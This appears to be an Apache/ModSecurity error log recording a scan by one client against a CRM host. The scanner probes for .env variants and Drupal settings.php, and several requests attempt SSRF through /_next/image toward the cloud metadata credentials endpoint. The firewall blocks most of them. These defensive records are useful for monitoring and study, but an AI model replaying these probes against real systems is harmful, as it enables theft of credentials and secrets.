[Mon May 11 15:23:09.447698 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeSQ-m-m0ukSShuB4wAAAUI"]
[Mon May 11 15:23:09.449823 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPat2WtvoFr7xvGzUWQAAAIE"]
[Mon May 11 15:23:09.450403 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPat2WtvoFr7xvGzUWQAAAIE"]
[Mon May 11 15:23:09.450589 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPat2WtvoFr7xvGzUWQAAAIE"]
[Mon May 11 15:23:09.455845 2026] [proxy_fcgi:error] [pid 1319953:tid 1319974] [client 195.178.110.133:2562] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.464368 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPeSQ-m-m0ukSShuB5gAAAUI"]
[Mon May 11 15:23:09.464485 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPeSQ-m-m0ukSShuB5gAAAUI"]
[Mon May 11 15:23:09.464664 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPeSQ-m-m0ukSShuB5gAAAUI"]
[Mon May 11 15:23:09.473176 2026] [proxy_fcgi:error] [pid 1319953:tid 1319974] [client 195.178.110.133:2562] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.478098 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPVchVQ3tCn0m9OpZGQAAAQg"]
[Mon May 11 15:23:09.478241 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPVchVQ3tCn0m9OpZGQAAAQg"]
[Mon May 11 15:23:09.478424 2026] [security2:error] [pid 1319885:tid 1319898] [client 195.178.110.133:2574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPVchVQ3tCn0m9OpZGQAAAQg"]
[Mon May 11 15:23:09.491202 2026] [proxy_fcgi:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.496712 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeJEyNRN152ArOSMygAAAFc"]
[Mon May 11 15:23:09.496860 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeJEyNRN152ArOSMygAAAFc"]
[Mon May 11 15:23:09.497074 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeJEyNRN152ArOSMygAAAFc"]
[Mon May 11 15:23:09.508753 2026] [proxy_fcgi:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.514033 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPeJEyNRN152ArOSMywAAAFc"]
[Mon May 11 15:23:09.514195 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPeJEyNRN152ArOSMywAAAFc"]
[Mon May 11 15:23:09.514381 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPeJEyNRN152ArOSMywAAAFc"]
[Mon May 11 15:23:09.526485 2026] [proxy_fcgi:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.531722 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPeJEyNRN152ArOSMzAAAAFc"]
[Mon May 11 15:23:09.531869 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPeJEyNRN152ArOSMzAAAAFc"]
[Mon May 11 15:23:09.532091 2026] [security2:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPeJEyNRN152ArOSMzAAAAFc"]
[Mon May 11 15:23:09.543719 2026] [proxy_fcgi:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.561423 2026] [proxy_fcgi:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.579767 2026] [proxy_fcgi:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:09.597463 2026] [proxy_fcgi:error] [pid 1320398:tid 1320423] [client 195.178.110.133:2616] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.441432 2026] [security2:error] [pid 1320398:tid 1320413] [client 195.178.110.133:2804] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYP-JEyNRN152ArOSM0gAAAE0"]
[Mon May 11 15:23:11.441576 2026] [security2:error] [pid 1320398:tid 1320413] [client 195.178.110.133:2804] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYP-JEyNRN152ArOSM0gAAAE0"]
[Mon May 11 15:23:11.441780 2026] [security2:error] [pid 1320398:tid 1320413] [client 195.178.110.133:2804] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYP-JEyNRN152ArOSM0gAAAE0"]
[Mon May 11 15:23:11.442737 2026] [security2:error] [pid 1320674:tid 1320695] [client 195.178.110.133:2738] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYP6O9RdIr1DwxYR2SsgAAAMU"]
[Mon May 11 15:23:11.442863 2026] [security2:error] [pid 1320674:tid 1320695] [client 195.178.110.133:2738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYP6O9RdIr1DwxYR2SsgAAAMU"]
[Mon May 11 15:23:11.443424 2026] [security2:error] [pid 1320674:tid 1320695] [client 195.178.110.133:2738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYP6O9RdIr1DwxYR2SsgAAAMU"]
[Mon May 11 15:23:11.444028 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP1chVQ3tCn0m9OpZHQAAAQs"]
[Mon May 11 15:23:11.444180 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP1chVQ3tCn0m9OpZHQAAAQs"]
[Mon May 11 15:23:11.444181 2026] [security2:error] [pid 1320398:tid 1320403] [client 195.178.110.133:2772] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-JEyNRN152ArOSM0wAAAEM"]
[Mon May 11 15:23:11.444316 2026] [security2:error] [pid 1320398:tid 1320403] [client 195.178.110.133:2772] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-JEyNRN152ArOSM0wAAAEM"]
[Mon May 11 15:23:11.444346 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYP6t2WtvoFr7xvGzUYAAAAJE"]
[Mon May 11 15:23:11.444390 2026] [security2:error] [pid 1319885:tid 1319904] [client 195.178.110.133:2718] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYP1chVQ3tCn0m9OpZHQAAAQs"]
[Mon May 11 15:23:11.444790 2026] [security2:error] [pid 1320398:tid 1320403] [client 195.178.110.133:2772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYP-JEyNRN152ArOSM0wAAAEM"]
[Mon May 11 15:23:11.445275 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYP6t2WtvoFr7xvGzUYAAAAJE"]
[Mon May 11 15:23:11.446317 2026] [proxy_fcgi:error] [pid 1319953:tid 1319956] [client 195.178.110.133:2770] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:11.446954 2026] [security2:error] [pid 1319998:tid 1320017] [client 195.178.110.133:2814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.crm.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYP6t2WtvoFr7xvGzUYAAAAJE"]
[Mon May 11 15:23:11.458227 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.133:2748] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYP1chVQ3tCn0m9OpZHwAAARI"]
[Mon May 11 15:23:11.458285 2026] [security2:error] [pid 1320398:tid 1320413] [client 195.178.110.133:2804] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYP-JEyNRN152ArOSM1QAAAE0"]
[Mon May 11 15:23:11.458347 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.133:2748] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.crm.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYP1chVQ3tCn0m9OpZHwAAARI"]
